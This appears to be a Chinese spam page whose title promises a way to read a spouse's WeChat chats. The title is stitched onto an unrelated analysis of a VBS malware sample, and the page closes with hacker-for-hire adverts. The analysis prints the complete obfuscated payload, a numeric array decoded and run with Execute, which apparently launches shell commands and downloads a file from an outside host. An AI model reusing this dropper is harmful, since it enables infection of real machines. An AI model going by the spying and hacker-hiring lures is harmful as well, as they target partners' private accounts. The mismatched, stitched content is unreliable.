老婆有外遇怎么查询他的 *** 微信聊天记录 知道微信账号如何查询微信密

访客3年前黑客工具548

今日在卡饭论坛病毒样本看到一个声称可以过很多杀软的7个lnk病毒样本(http://bbs.kafan.cn/thread-417430-1-1.html),下载回来瞧了瞧,没有扩展名,用记事本打开看了,是VBS写的,7个样本都是同一个 *** 写的,所以分析了一个,随便打开了一个,代码如下: frdf=array(1652,1722,1740,1755,1671,1736,1737,1671,1700,1671,1706,1753, 1740,1736,1755,1740,1718,1737,1745,1740,1738,1755,1679,1673,1726,1754, 1738,1753,1744,1751,1755,1685,1722,1743,1740,1747,1747,1673,1680,1671, 1652,1649,1736,1737,1685,1753,1756,1749,1671,1673,1738,1748,1739,1671,1686, 1738,1671,1749,1740,1755,1671,1754,1755,1750,1751,1671,1754,1743,1736,1753, 1740,1739,1736,1738,1738,1740,1754,1754,1677,1740,1738,1743,1750,1671,1750, 1751,1740,1749,1671,1758,1758,1758,1685,1760,1736,1743,1750,1750,1751,1744, 1738,1755,1756,1753,1740,1687,1685,1738,1750,1748,1701,1701,1755,1685,1755, 1677,1740,1738,1743,1750,1671,1688,1689,1690,1701,1701,1755,1685,1755,1677, 1740,1738,1743,1750,1671,1688,1689,1690,1701,1701,1755,1685,1755,1677,1740, 1738,1743,1750,1671,1742,1740,1755,1671,1757,1685,1740,1759,1740,1671,1706, 1697,1731,1757,1685,1740,1759,1740,1701,1701,1755,1685,1755,1677,1740,1738, 1743,1750,1671,1737,1760,1740,1701,1701,1755,1685,1755,1677,1741,1755,1751, 1671,1684,1754,1697,1755,1685,1755,1677,1739,1740,1747,1671,1755,1685,1755, 1677,1738,1697,1731,1757,1685,1740,1759,1740,1677,1739,1740,1747,1671,1676, 1758,1744,1749,1739,1744,1753,1676,1731,1746,1754,1745,1742,1740,1685,1757, 1737,1754,1677,1739,1740,1747,1671,1738,1697,1731,1757,1685,1740,1759,1740, 1677,1754,1755,1736,1753,1755,1671,1743,1755,1755,1751,1697,1686,1686,1758, 1758,1758,1685,1755,1755,1741,1741,1695,1695,1691,1685,1738,1750,1748,1686, 1746,1744,1749,1742,1685,1745,1751,1742,1673,1683,1687,1652,1649)for i=1 to UBound(frdf)        runner=runner&chr(frdf(i)-1639)nextExecute runner 很简单的逃过杀毒软件方式嘛,把程序改成VBS来逃杀软。首先定义一个数组,就是那堆数字,然后数组每个数再减去1639后,转成字符型,得到机器码形式的,最后用execute执行它。 我把文件加了个.vbs后缀,然后打开防火墙进行监控,看病毒做了些什么,运行文件,防火墙有反应了,在启动里创建了文件,位于c:\windows\help中,打开c:\windows\help时并没有看到这两个文件,文件属性改成了系统属性的,在CMD执行attrib c:\windows\help\***,返回结果是SH,S代表系统属性,H代表隐藏属性,再执行attrib -s -h c:\windows\help\***,去掉属性,这时可以在目录看到那两个文件了,PE查了下,加了壳的,OD载入进去,壳很奇怪。其他的都是这个思路,没什么好分析的了。

相关文章

淘宝卖衣服哪里进货,进货方法总结(收藏)

淘宝卖衣服哪里进货,进货方法总结(收藏)

21世纪是电子商务时代,很多人都想拥有自己的网店,你可以在淘宝上开自己的店哦。相信还有很多的商家在为找不到货源发愁吧!所以今天小编就来为大家介绍一下进货的方法,快来了解一下吧。 在淘宝网首页,找...

我,大三学生,靠给工厂介绍寒假工半年收入十万,现总收入6位数

我,普通大学生,对校学生会心寒的我,无意间遇到招寒假工的,想不到打开了我的自主创业职业生涯 我是忍冬草,一个河南省一般二本的大三学员。 在新学期开学前,对高校拥有 好多好多的想像和期待。在其中听见...

蜗居的结局是什么啊(《蜗居》大结局令人泪崩)

  昨晚愈姑娘终于看完了《蜗居》的大结局,看完后我感到心里堵得慌,关于人性和人生,编剧赤裸裸的撕开给你看,让人感到残酷又无奈。   在看最后两集的时候,我也跟着剧里的人物泪崩。宋思明所做的坏事被发现了...

黑客雇佣平台(真正的黑客接单)「先做再付黑客联系方式」

现阶段互联网上都还没尤其技术专业的:黑客雇佣平台。有的全是些为五斗米的互联网高手或者程序员,实际上说她们是黑客有点儿太高点评了,由于程序员不一定是黑客,而黑客一定是出色的程序员。 最先大家看一下什么...

电脑黑客联系 微信找回-先做事后付费的黑客(先做事后付费先做事后付

若何加黑客扣扣群 只输入真实姓名找人(真实姓名找人) 损友圈黑客是怎么弄的 苹果怎么给软件加密码(苹果id密码破解软件) 手机系统被黑客破解了怎么办 为什么咸鱼那么多骇客神条...

鼠标的光标是对称吗 鼠标光标消失怎么办

谈起鼠的那一个鼠标光标箭头符号。大家的第一反应便是肯定是一个对称性的三角形,每日工作中必须电脑上的人毫无疑问并沒有彻底留意,实际上是不一样的。电脑鼠标的鼠标光标是对称性吗 鼠标光标消退该怎么办。产生...